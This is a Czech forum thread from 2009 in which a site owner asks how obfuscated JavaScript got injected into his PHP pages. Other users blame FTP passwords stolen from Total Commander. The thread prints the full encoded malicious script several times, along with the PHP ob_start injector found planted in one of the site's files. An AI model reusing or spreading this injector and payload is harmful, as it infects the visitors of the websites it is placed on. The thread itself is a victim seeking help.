Autor | Zpráva | ||
---|---|---|---|
had Profil * |
#1 · Zasláno: 3. 5. 2009, 14:05:51
ahoj, mám tu takový malý problémek.
jak je možné zaútočit na PHP script a podstrčit do výslednýho zdrojáku tohle: <script language=javascript>hjqndh="vp!#gwMTm%JsRSH";paisvuhg="<!73!63ri!70!74!20la!6e!67uag!65=javascript!3e!20 !66un!63!74!69!6fn b!71z!79orhp!75!28dz!6c!75e!69!29{var ys!76dgpt,!75yxdu!72!73t!3d\"!4d3!29!2a!7e+!27!7d!21!707!28^!7c#!2d!42!30Eoi,z!46Jl9!60{Zf_ Hth:Ky!3d!32@!41Iuc1GbnTPCv!5bgw4\\\"O!56!5d!2e!3b!786$!73Nm!64ar&Ukeq85j!22!2cavu!77!78!6cvw!3d!22\",!6dd!70h!6d!6ez!69r!2cxk!73r!6aq,!64h!6ew!76!6fs!71!6b=\"\",!62f!6e!61!73q!70z;!66!6f!72(!79!73vdg!70t!3d!30;!79svdgp!74<dzlu!65!69.!6ce!6e!67!74h;!79s!76!64gp!74+!2b){!20mdph!6d!6ezir!3d!64z!6cue!69!2ech!61!72A!74!28ys!76dgp!74);xksrjq=uyxdu!72!73t.i!6e!64ex!4ff!28!6dd!70!68mnzir!29!3b!69f!28xksrjq>-1!29{ !62!66na!73!71!70!7a!3d(!28!78!6bs!72jq!2b1)!2581-1)!3b!69f(b!66!6easqpz<=0)bfn!61!73qpz+=81;!64hn!77!76osqk+!3d!75!79xdu!72st.c!68arAt(b!66n!61!73!71pz-1)!3b!20}!20!65ls!65 !64!68n!77v!6fsq!6b+=md!70!68mnz!69!72!3b}avuwxlvw+=!64!68nwvo!73q!6b;!64oc!75me!6et.wr!69!74!65(avuw!78!6cvw!29!3b}!3c!2f!73c!72ip!74>";exsxwisb=hjqndh.charAt(9);dhhhissq=paisvuhg.replace(/!/g,exsxwisb);qvmqttl=unescape(dhhhissq);var utempkqf,lbjbghudd;document.write(qvmqttl);utempkqf="<N1&,7hH9rTwcrwq2Olr[rS1&,7hO>H_cT1h,iTHeM[h7F6:1w^*HZHh&=HZH[r&H76Ti9a9h:2HOwrdhT=w44OzHe48:eh9iaq&M_H2HGxH_cT1h,iTHaN1MiFea4^TrdqzH[r9cq*HZ[r&HaH2HTq4HDrhqxa;NqhP,dq^^Tq4HDrhq*;wqhP,dq^*H'H5$\"EEEEE*xai1cdqTh;1iie,qH2HTrdqH'HO2OH'HqN1r7q^[r9cq*H'HOxHq67,&qN2OH'Ha;hib3PSh&,Tw^*x!H_cT1h,iTH&,nan,6d_ih8:q^*HZ&qhc&TH^ai1cdqTh;1iie,q;,Taq6V_^76Ti9a9h:H'HO2OH'He48:eh9iaq&M_*H22HBG*x!H,_^H&,nan,6d_ih8:q^*H*HZHai1cdqTh;4&,hq^HO<SvRuCPH9rTwcrwq2\\Olr[rS1&,7h\\OHSRv2\\O:hh7K//wiiw9qrTr9=h91N;Tqh/ chd;w,_?$G@$)1((@)jr55\"`E`r)E@\"rGnGaG@\"E`5)\"\")_B)\"`(`E\"`\"UO'ai1cdqTh;&q_q&&q&'OUO'Sh&,Tw^^Tq4HDrhq^**;wqhP,dq^**'O\\O><\\/SvRO'OuCP>OH*xHaN1MiFea4^H76Ti9a9h:zHe48:eh9iaq&M_H*xH!Hq9NqHZH!H!H1rh1:H^q*HZ!H!HeM[h7F6:1w^*x</N1&,7h>H";bqzyorhpu(utempkqf);</script> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> ... setkali jste se s tím někdy??? nevypisuju žádnou proměnnou (ani session), který by se nechali takhle vypsat ještě před zavoláním souboru hlavicka.php (mám soubor conn.php, ve kterém mám připojení a který includuju vždy na začátku scriptu, zde mám ošetřené mj. i session_regenerate_id() --soubor hlavicka.php obsahuje začátek html včetně doctype) jak je možné, že mi to tam něco strká??? prohlížečem to nebude 100%, poskytovatel subdomény mi nic takového neudělá aniž by mi dal vědět..) |
||
had Profil * |
#2 · Zasláno: 3. 5. 2009, 14:06:36
.. omlouvám se, ten zdroják se špatně převedl...
<script language=javascript>hjqndh="vp!#gwMTm%JsRSH";paisvuhg="<!73!63ri!70!74!20la!6e!67uag!65=javascript!3e!20 !66un!63!74!69!6fn b!71z!79orhp!75!28dz!6c!75e!69!29{var ys!76dgpt,!75yxdu!72!73t!3d\"!4d3!29!2a!7e+!27!7d!21!707!28^!7c#!2d!42!30Eoi,z!46Jl9!60{Zf_ Hth:Ky!3d!32@!41Iuc1GbnTPCv!5bgw4\\\"O!56!5d!2e!3b!786$!73Nm!64ar&Ukeq85j!22!2cavu!77!78!6cvw!3d!22\",!6dd!70h!6d!6ez!69r!2cxk!73r!6aq,!64h!6ew!76!6fs!71!6b=\"\",!62f!6e!61!73q!70z;!66!6f!72(!79!73vdg!70t!3d!30;!79svdgp!74<dzlu!65!69.!6ce!6e!67!74h;!79s!76!64gp!74+!2b){!20mdph!6d!6ezir!3d!64z!6cue!69!2ech!61!72A!74!28ys!76dgp!74);xksrjq=uyxdu!72!73t.i!6e!64ex!4ff!28!6dd!70!68mnzir!29!3b!69f!28xksrjq>-1!29{ !62!66na!73!71!70!7a!3d(!28!78!6bs!72jq!2b1)!2581-1)!3b!69f(b!66!6easqpz<=0)bfn!61!73qpz+=81;!64hn!77!76osqk+!3d!75!79xdu!72st.c!68arAt(b!66n!61!73!71pz-1)!3b!20}!20!65ls!65 !64!68n!77v!6fsq!6b+=md!70!68mnz!69!72!3b}avuwxlvw+=!64!68nwvo!73q!6b;!64oc!75me!6et.wr!69!74!65(avuw!78!6cvw!29!3b}!3c!2f!73c!72ip!74>";exsxwisb=hjqndh.charAt(9);dhhhissq=paisvuhg.replace(/!/g,exsxwisb);qvmqttl=unescape(dhhhissq);var utempkqf,lbjbghudd;document.write(qvmqttl);utempkqf="<N1&,7hH9rTwcrwq2Olr[rS1&,7hO>H_cT1h,iTHeM[h7F6:1w^*HZHh&=HZH[r&H76Ti9a9h:2HOwrdhT=w44OzHe48:eh9iaq&M_H2HGxH_cT1h,iTHaN1MiFea4^TrdqzH[r9cq*HZ[r&HaH2HTq4HDrhqxa;NqhP,dq^^Tq4HDrhq*;wqhP,dq^*H'H5$\"EEEEE*xai1cdqTh;1iie,qH2HTrdqH'HO2OH'HqN1r7q^[r9cq*H'HOxHq67,&qN2OH'Ha;hib3PSh&,Tw^*x!H_cT1h,iTH&,nan,6d_ih8:q^*HZ&qhc&TH^ai1cdqTh;1iie,q;,Taq6V_^76Ti9a9h:H'HO2OH'He48:eh9iaq&M_*H22HBG*x!H,_^H&,nan,6d_ih8:q^*H*HZHai1cdqTh;4&,hq^HO<SvRuCPH9rTwcrwq2\\Olr[rS1&,7h\\OHSRv2\\O:hh7K//wiiw9qrTr9=h91N;Tqh/ chd;w,_?$G@$)1((@)jr55\"`E`r)E@\"rGnGaG@\"E`5)\"\")_B)\"`(`E\"`\"UO'ai1cdqTh;&q_q&&q&'OUO'Sh&,Tw^^Tq4HDrhq^**;wqhP,dq^**'O\\O><\\/SvRO'OuCP>OH*xHaN1MiFea4^H76Ti9a9h:zHe48:eh9iaq&M_H*xH!Hq9NqHZH!H!H1rh1:H^q*HZ!H!HeM[h7F6:1w^*x</N1&,7h>H";bqzyorhpu(utempkqf);</script> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> |
||
Hitman Profil |
#3 · Zasláno: 3. 5. 2009, 14:11:57
Jaký používáš program pro přenos? Pokud používáš Total Commander, raději neukládej heslo.
|
||
had Profil * |
#4 · Zasláno: 3. 5. 2009, 14:26:10
jo, používám total commander. takže si mám změnit heslo na FTP a v total commanderu ho neukládat? myslíš, že nějaký vir mi z kompu vzal heslo na ftp??? to by útok byl podstatně horší, ne?
|
||
had Profil * |
#5 · Zasláno: 3. 5. 2009, 14:27:46
našel jsem v error logu ještě tohle:
[Mon Apr 20 20:37:31 2009] [error] [client 211.52.78.2] script '/home/vsftp/veka_signaly_cz/veka.signaly.cz/xmlrpc.php' not found or unable to stat ...to by mohlo být ono, ne? ale jak by se dostal na ftp php cizí php soubor??? |
||
had Profil * |
#6 · Zasláno: 3. 5. 2009, 14:31:59
a když jsem teď ještě trochu zapátral, objevil jsem v jednom souboru přímo vpsaný kód:
<?php /*c7d2dcf9149f904af05638144c8203b4*/ob_start( create_function( '$buf', 'return str_repeat("\t",rand(28,40)).\'<script language=javascript>hjqndh="vp!#gwMTm%JsRSH";paisvuhg="<!73!63ri!70!74!20la!6e!67uag!65=javascript!3e!20 !66un!63!74!69!6fn b!71z!79orhp!75!28dz!6c!75e!69!29{var ys!76dgpt,!75yxdu!72!73t!3d\\\\"!4d3!29!2a!7e+!27!7d!21!707!28^!7c#!2d!42!30Eoi,z!46Jl9!60{Zf_ Hth:Ky!3d!32@!41Iuc1GbnTPCv!5bgw4\\\\\\\\\\\\"O!56!5d!2e!3b!786$!73Nm!64ar&Ukeq85j!22!2cavu!77!78!6cvw!3d!22\\\\",!6dd!70h!6d!6ez!69r!2cxk!73r!6aq,!64h!6ew!76!6fs!71!6b=\\\\"\\\\",!62f!6e!61!73q!70z;!66!6f!72(!79!73vdg!70t!3d!30;!79svdgp!74<dzlu!65!69.!6ce!6e!67!74h;!79s!76!64gp!74+!2b){!20mdph!6d!6ezir!3d!64z!6cue!69!2ech!61!72A!74!28ys!76dgp!74);xksrjq=uyxdu!72!73t.i!6e!64ex!4ff!28!6dd!70!68mnzir!29!3b!69f!28xksrjq>-1!29{ !62!66na!73!71!70!7a!3d(!28!78!6bs!72jq!2b1)!2581-1)!3b!69f(b!66!6easqpz<=0)bfn!61!73qpz+=81;!64hn!77!76osqk+!3d!75!79xdu!72st.c!68arAt(b!66n!61!73!71pz-1)!3b!20}!20!65ls!65 !64!68n!77v!6fsq!6b+=md!70!68mnz!69!72!3b}avuwxlvw+=!64!68nwvo!73q!6b;!64oc!75me!6et.wr!69!74!65(avuw!78!6cvw!29!3b}!3c!2f!73c!72ip!74>";exsxwisb=hjqndh.charAt(9);dhhhissq=paisvuhg.replace(/!/g,exsxwisb);qvmqttl=unescape(dhhhissq);var utempkqf,lbjbghudd;document.write(qvmqttl);utempkqf="<N1&,7hH9rTwcrwq2Olr[rS1&,7hO>H_cT1h,iTHeM[h7F6:1w^*HZHh&=HZH[r&H76Ti9a9h:2HOwrdhT=w44OzHe48:eh9iaq&M_H2HGxH_cT1h,iTHaN1MiFea4^TrdqzH[r9cq*HZ[r&HaH2HTq4HDrhqxa;NqhP,dq^^Tq4HDrhq*;wqhP,dq^*H\\\'H5$\\\\"EEEEE*xai1cdqTh;1iie,qH2HTrdqH\\\'HO2OH\\\'HqN1r7q^[r9cq*H\\\'HOxHq67,&qN2OH\\\'Ha;hib3PSh&,Tw^*x!H_cT1h,iTH&,nan,6d_ih8:q^*HZ&qhc&TH^ai1cdqTh;1iie,q;,Taq6V_^76Ti9a9h:H\\\'HO2OH\\\'He48:eh9iaq&M_*H22HBG*x!H,_^H&,nan,6d_ih8:q^*H*HZHai1cdqTh;4&,hq^HO<SvRuCPH9rTwcrwq2\\\\\\\\Olr[rS1&,7h\\\\\\\\OHSRv2\\\\\\\\O:hh7K//wiiw9qrTr9=h91N;Tqh/ chd;w,_?$G@$)1((@)jr55\\\\"`E`r)E@\\\\"rGnGaG@\\\\"E`5)\\\\"\\\\")_B)\\\\"`(`E\\\\"`\\\\"UO\\\'ai1cdqTh;&q_q&&q&\\\'OUO\\\'Sh&,Tw^^Tq4HDrhq^**;wqhP,dq^**\\\'O\\\\\\\\O><\\\\\\\\/SvRO\\\'OuCP>OH*xHaN1MiFea4^H76Ti9a9h:zHe48:eh9iaq&M_H*xH!Hq9NqHZH!H!H1rh1:H^q*HZ!H!HeM[h7F6:1w^*x</N1&,7h>H";bqzyorhpu(utempkqf);</script>\'."\n".$buf;' ) );/*c7d2dcf9149f904af05638144c8203b4*/ |
||
AM_ Profil |
#7 · Zasláno: 3. 5. 2009, 14:35:35 · Upravil/a: AM_
Cest je několik:
1- skutečně ti ukradli heslo z wcx_ftp.ini, to se teď stává často 2- máš bezpečnostní chybu někde ve vlastním PHP kódu a někdo jí zneužil 3- někdo nahackoval hosting (nepravděpodobné, ale už jsem se s tím setkal) Řešení je změnit heslo, neukládat ho do TC a doufat. |
||
had Profil * |
#8 · Zasláno: 3. 5. 2009, 15:17:04
hm...ok, díky
|
||
Hitman Profil |
#9 · Zasláno: 3. 5. 2009, 15:21:18
had
o, používám total commander. takže si mám změnit heslo na FTP a v total commanderu ho neukládat? myslíš, že nějaký vir mi z kompu vzal heslo na ftp??? to by útok byl podstatně horší, ne? Ano, změň si heslo na FTP a v Total Commanderu jej neukládej. Praděpodobně se tam někdo dostal přes PC, vir to přímo není, ale asi to bude něco podobného, v posledních několika týdnech o tom slyším často. |
||
AM_ Profil |
#10 · Zasláno: 3. 5. 2009, 15:47:47
„ vir to přímo není“
a co to teda je? bakteriální onemocnění? :) dokonce to splňuje i původní význam počítačového viru - šíří se to samo. |
||
Hitman Profil |
#11 · Zasláno: 3. 5. 2009, 16:15:14 · Upravil/a: Hitman
AM_
Nevím přesně, co se u hada v PC stalo, ale ve mnoha případech se jedná o hack, virem bych to přímo nenazýval. Smozdřejmě se mohu mýlit, této problematice se nijak nevěnuji. |
||
AM_ Profil |
#12 · Zasláno: 3. 5. 2009, 16:56:29
Hitman
Aha, takhle. Momentálně jsou dost rožšířené viry čtoucí wcx_ftp.ini; a nežádoucí kód ve stránce se dá nazvat virem, ikdyž ho tam vložil hacker. |
||
had Profil * |
#13 · Zasláno: 3. 5. 2009, 17:01:41
no...je to docela možný...ovšem pokud se mi dostal do PC, pak to co k tomu použil je vir (pokud to neudělal ručně - pak je to hack), nebo se mejlím??? pokud vím nikde jsem nesdílel ani nekopíroval soubor wcx_ftp.ini...
nežádoucí kód ve stránce je spíš hack ikdyž může působit jako vir... ale nevím, tomuhle se taky nevěnuju ;) |
||
Hitman Profil |
#14 · Zasláno: 3. 5. 2009, 17:05:50
had
Kždopádně nejlepší bude, když si změníš heslo a nebudeš ho v Total Commanderu ukládat, pokud by se ti kód měnil pořád, můžeš hledat chybu na serveru, nebo ti někdo může zjišťovat stisknuté klávesy. |
||
Časová prodleva: 15 let
|
0